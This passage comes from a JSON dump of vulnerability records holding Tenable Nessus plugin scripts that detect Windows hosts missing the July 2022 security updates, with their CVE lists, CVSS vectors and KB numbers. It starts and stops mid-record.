Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015875\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015875 or Cumulative Update 5015863\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-22026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015875',\n '5015863'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015875, 5015863])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T10:27:45", "description": "The remote Windows host is missing security update 5015862 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015862.NASL", "href": "https://www.tenable.com/plugins/nessus/163050", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163050);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015861\");\n script_xref(name:\"MSKB\", value:\"5015862\");\n script_xref(name:\"MSFT\", value:\"MS22-5015861\");\n script_xref(name:\"MSFT\", value:\"MS22-5015862\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015862 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015862\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015862 or Cumulative Update 5015861\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015862',\n '5015861'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015862, 5015861])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:22", "description": "The remote Windows host is missing security update 5015877 or cumulative update 5015874. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015877: Windows Server 2012 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015877.NASL", "href": "https://www.tenable.com/plugins/nessus/163042", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163042);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015874\");\n script_xref(name:\"MSKB\", value:\"5015877\");\n script_xref(name:\"MSFT\", value:\"MS22-5015874\");\n script_xref(name:\"MSFT\", value:\"MS22-5015877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015877: Windows Server 2012 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015877\nor cumulative update 5015874. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015877\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015877 or Cumulative Update 5015874\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015877',\n '5015874'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015877, 5015874])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015832. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015832: Windows 10 LTS 1507 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015832.NASL", "href": "https://www.tenable.com/plugins/nessus/163053", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163053);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015832\");\n script_xref(name:\"MSFT\", value:\"MS22-5015832\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015832: Windows 10 LTS 1507 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015832. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015832\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015832\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015832\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015832'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 